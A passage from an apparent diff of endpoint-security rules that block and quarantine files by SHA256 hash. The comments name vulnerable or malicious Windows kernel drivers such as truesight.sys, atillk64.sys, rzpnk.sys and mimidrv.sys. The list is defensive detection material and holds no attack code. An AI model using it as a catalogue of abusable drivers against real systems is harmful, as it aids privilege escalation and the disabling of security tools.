+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.499162Z",
+ "creation_date": "2026-03-23T11:45:31.499165Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.499173Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "bff977eab714911c400790b58513565952885cb348237de101a172474016cf64",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "082b28c9-c335-5397-af2b-d62ebfaeb8d4",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.815011Z",
+ "creation_date": "2026-03-23T11:45:31.815014Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.815023Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2c3cf064c8167dc82ee144f01483c4b870252318d23c1d1439cdcc36bbe639a4",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "08318274-0a03-57b7-a98a-aa4a6031b930",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.617323Z",
+ "creation_date": "2026-03-23T11:45:29.617325Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.617331Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "248dcc72d799d350d30b0f9e9ae93389cdcd11b43e38949ba9be414400657587",
+ "comment": "ATI Technologies vulnerable GPU flash tool (aka atillk64.sys) [CVE-2020-12138] [https://www.loldrivers.io/drivers/61514cbd-6f34-4a3e-a022-9ecbccc16feb/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "083bb25d-92c0-5ecf-891b-4a75f07b4bd5",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.153924Z",
+ "creation_date": "2026-03-23T11:45:31.153926Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.153932Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "93df5db6037d76c3dabdb6b8dd384665f62ae8381d24b35e220fee93c2c715d7",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "083f4573-950b-5aa8-abf6-0deae5fc923f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.488292Z",
+ "creation_date": "2026-03-23T11:45:31.488294Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.488300Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8f7afd13d94d7c73dc4585456c1fb2abbecdc154434198f8a19a7950b724382b",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "084330c4-8397-5052-84fd-e91be2d9b91c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.828632Z",
+ "creation_date": "2026-03-23T11:45:30.828634Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.828639Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1b2ef93d0b7bba53f358dc2f7bdc1033c1925842966f21f8a6ccb2b3fe30065e",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "08486284-66b1-5497-b97e-82a02a91d22e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.616939Z",
+ "creation_date": "2026-03-23T11:45:29.616948Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.616958Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "96cb847fab0befab75a6f39080dd444d022d4bec73017c9d7187fe6282a0faa1",
+ "comment": "American Megatrends vulnerable BIOS flash tool (aka UCOREW64.SYS and amifldrv64.sys) [https://www.loldrivers.io/drivers/a338a9fc-9fe3-400c-9fe4-69bb7892602d/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "08603510-e98f-56f5-906b-7f210979c9f6",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.811701Z",
+ "creation_date": "2026-03-23T11:45:31.811705Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.811713Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b292a62ad8f320fcf9327b1bde23c360b843778c905a0b0633ea30044a6a7457",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0862fa33-7f89-5c24-88c8-70226a1264b3",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.810769Z",
+ "creation_date": "2026-03-23T11:45:31.810771Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.810778Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d6a09e5c1b36a57a0aa46f469b52dbc60df21cfb92985a7abf26104996b6d5dc",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "086618ac-fcc9-5e93-ac97-83dc65dd6962",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.617431Z",
+ "creation_date": "2026-03-23T11:45:29.617433Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.617438Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "be66f3bbfed7d648cfd110853ddb8cef561f94a45405afc6be06e846b697d2b0",
+ "comment": "ATI Technologies vulnerable GPU flash tool (aka atillk64.sys) [CVE-2020-12138] [https://www.loldrivers.io/drivers/61514cbd-6f34-4a3e-a022-9ecbccc16feb/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "087404c1-b0b2-5fd4-b89c-246111c321c5",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.143927Z",
+ "creation_date": "2026-03-23T11:45:31.143929Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.143935Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "deee9c8f018d7d2fa18e5409ebfc85dca0dd9600b94774f998ef0cd5bce77080",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0874a627-74b7-5900-a9e5-d756636da0a2",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.498684Z",
+ "creation_date": "2026-03-23T11:45:31.498687Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.498696Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "46dae2e1e9e040eec78cbf74c5b7adf5e34796e94869de2668c47c770f1c4ab3",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "08828464-2abd-5763-9d16-8ab03b62390b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.465057Z",
+ "creation_date": "2026-03-23T11:45:30.465060Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.465068Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6964a5d85639baee288555797992861232e75817f93028b50b8c6d34aa38b05b",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "08832b6b-d7db-5517-9dfd-1f031ccee6cd",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.980664Z",
+ "creation_date": "2026-03-23T11:45:29.980666Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.980671Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "def61560c0650717cb1da923f0d674b363b8f2051247719b34f06744bbb79000",
+ "comment": "Vulnerable Kernel Driver (aka rzpnk.sys) [https://www.loldrivers.io/drivers/1c6e1d3b-f825-4065-9e0c-83386883e40f/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0884b735-d5f9-5bd1-8f5a-d4247e2ef3ba",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.980621Z",
+ "creation_date": "2026-03-23T11:45:29.980624Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.980633Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "af9c600edb134fb8f21d585bbf7d0a4d3f1b792b6dd104c10d38f220f47671f8",
+ "comment": "Vulnerable Kernel Driver (aka rzpnk.sys) [https://www.loldrivers.io/drivers/1c6e1d3b-f825-4065-9e0c-83386883e40f/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "088e8227-4f7f-5737-b5ba-ad3afd6c2d85",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.982432Z",
+ "creation_date": "2026-03-23T11:45:29.982434Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.982439Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9c6213a8222f087be42f493e37edf17e261e9afa0c832d05f3f1f54a318f60d2",
+ "comment": "Vulnerable Kernel Driver (aka windows7-32.sys) [https://www.loldrivers.io/drivers/b45a3fdf-592a-4cd9-81e2-8fe03d554cad/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "089e5840-ad92-5edc-8191-b5c53fb79121",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.491654Z",
+ "creation_date": "2026-03-23T11:45:31.491657Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.491664Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ad6b609b08a46738958bdcd3158b2697934fbb65ddb15b59bb1fe9810b7578b8",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "089f5567-cea7-5a45-bb55-c00308a7b090",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.976173Z",
+ "creation_date": "2026-03-23T11:45:29.976175Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.976181Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8e035beb02a411f8a9e92d4cf184ad34f52bbd0a81a50c222cdd4706e4e45104",
+ "comment": "Malicious attestation-signed Drivers (aka NodeDriver.sys, 4.sys, Air_SYSTEM10.sys etc.) [https://www.mandiant.com/resources/blog/hunting-attestation-signed-malware] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "08a8b7b8-39d6-5e3b-a1e4-482bb4a1544b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.810593Z",
+ "creation_date": "2026-03-23T11:45:31.810595Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.810601Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "78086b63e901f3f8d086a54b6e3868494026520843463ba084e48e1271b295dd",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "08c1369b-4330-5170-9a55-21041727e016",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.830420Z",
+ "creation_date": "2026-03-23T11:45:30.830422Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.830428Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "32b7268733588e5884d01ab8a29bae20ce6d412711950281774dd727ff7fdbf2",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "08cbe670-69a1-518c-a194-467265f6cf8e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.612266Z",
+ "creation_date": "2026-03-23T11:45:29.612268Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.612273Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9c2977d63faa340b03e1bbfb8a6db19c0adfa60ff6579b888ece10022c94c3ec",
+ "comment": "ASUS WinFlash vulnerable driver (aka ATSZIO.sys and ATSZIO64.sys) [https://github.com/Chigusa0w0/AsusDriversPrivEscala/blob/master/ATSZIO.md] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "08f48dfd-3718-5538-9db9-331f5068241b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.807965Z",
+ "creation_date": "2026-03-23T11:45:31.807968Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.807976Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "78d78ad77ac2cae14b0faf8638c5fd649afef26bbc0893ae35987dac465b4bc1",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0924a07f-49fa-5aa8-ac72-8adb0447f984",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.820030Z",
